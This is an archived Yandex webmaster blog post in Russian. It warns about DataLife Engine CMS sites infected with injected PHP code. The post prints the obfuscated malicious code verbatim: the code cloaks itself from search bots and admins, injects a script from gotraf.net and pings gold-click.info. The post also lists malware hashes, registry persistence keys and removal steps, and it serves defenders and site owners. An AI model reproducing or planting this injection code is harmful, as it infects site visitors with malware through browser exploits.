Блог Яндекса для вебмастеров

О случаях заражения сайтов, работающих на CMS DataLife Engine

Пост в архиве.
Причиной заражения сайтов вредоносным кодом часто становится взлом систем управления контентом с последующим изменением их исходных кодов.

Мы обнаружили, что в последнее время стали чаще происходить случаи заражения сайтов, работающих на CMS DataLife Engine кодом, который добавляет на страницу тег <script>. Пример кода, которым происходит заражение:


<? $GLOBALS['_dleget_']=Array(base64_decode('' .'cHJlZ19' .'tYX' .'RjaA=='),base64_decode('cH' .'JlZ19' .'tYXRjaA=='),base64_decode('cHJlZ19tY' .'XRjaA==')); ?><? function dleget($i){$a=Array('ZGxlX3Bhc3N3b3Jk','L3lhbmRleC9p','SFRUUF9VU0VSX0FHRU5U','L2dvb2dsZS9p','SFRUUF9VU0VSX0FHRU5U','L2JvdC9p','SFRUUF9VU0VSX0FHRU5U', PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCIgY2hhcnNldD0id2luZG93cy0xMjUxIiByZWw9Im5vZm9sbG93IiBzcmM9Imh0dHA6Ly9nb3RyYWYubmV0L2luLnBocD9pZD0xMTEiPjwvc2NyaXB0Pg== ');return base64_decode($a[$i]);} ?><? if((!isset($_COOKIE[dleget(0)]))and(!$GLOBALS['_dleget_'][0](dleget(1),$_SERVER[dleget(2)]))and(!$GLOBALS['_dleget_'][1](dleget(3),$_SERVER[dleget(4)]))and(!$GLOBALS['_dleget_'][2](dleget(5),$_SERVER[dleget(6)]))){echo dleget(7);} if(isset($_SERVER["HTTP_HOST"])){ $host = str_replace("www.","",$_SERVER["HTTP_HOST"]); file_get_contents('http://gold-click.info/tds.php?jkdptbw='.$host);} ?>


Данный код проверяет, установлены ли cookie с именем dle_password и присутствуют ли в значении HTTP-заголовка User-Agent следующие строки:
  • yandex
  • google
  • bot

Если cookie с именем dle_password не установлены и в значении HTTP заголовка User-Agent не присутствует строк yandex, google или bot, то в код страницы вставляется:

<script src=http://gotraf.net/in.php?id=<id>
где <id> – трёхзначное число.

Общие рекомендации, как удалить со страницы вредоносный код и больше не дать его разместить, описаны в соответствующем разделе помощи. Узнать подробности о том, какие страницы заражены, можно, зарегистрировав заражённый сайт на Яндекс.Вебмастере.

При посещении сайта, который использует CMS, зараженную данным серверным скриптом, в браузере автоматически исполняется браузерный скрипт, подгружаемый с хоста gotraf.net. Этот браузерный скрипт пытается эксплуатировать уязвимости в популярных браузерах и сторонних продуктах. При удачной эксплуатации хотя бы одной из уязвимостей на компьютер пользователя загружается и устанавливается вредоносное ПО.

По данным с virustotal.com, на 19.07.2011 вредоносное ПО с хоста gotraf.net детектировалось только антивирусами:

Хэши вредоносного файла:
  • MD5: c852cb73a67be8080b292577e77349d0 ;
  • SHA1: d66db7ab31b5b6ac83cb17b58e40f1eca3acc2d9 ;
  • SHA256: d01d44972e2e853907ec0f6acaa9ff60bb797825c0dd107655f1b963c70ce2a1 .

Вирус блокирует работу операционной системы, копирует себя в папку C:\Program Files\Common Files\ с именем winlogin.exe, а также создает 2 записи в реестре, чтобы при каждом последующем старте операционной системы происходил его запуск.

Записи в реестре:
  • HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Winlogon\Shell = Explorer.exe "C:\Program Files\Common Files\winlogin.exe" ;
  • HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Run\winlogin = "C:\Program Files\Common Files\winlogin.exe" .

Для удаления вируса с компьютера пользователя вручную, нужно удалить соответствующие записи в реестре, а также файл winlogin.exe (не перепутайте с winlogon.exe) .

Чтобы удалить вирус, можно также воспользоваться бесплатными утилитами от Лаборатории Касперского и DrWeb, приведёнными в этом разделе.

Как выбрать и настроить браузер, антивирус, брандмауэр, ОС компьютера, чтобы обеспечить максимальную безопасность работы в Интернете – описано здесь.

Команда безопасного поиска Яндекса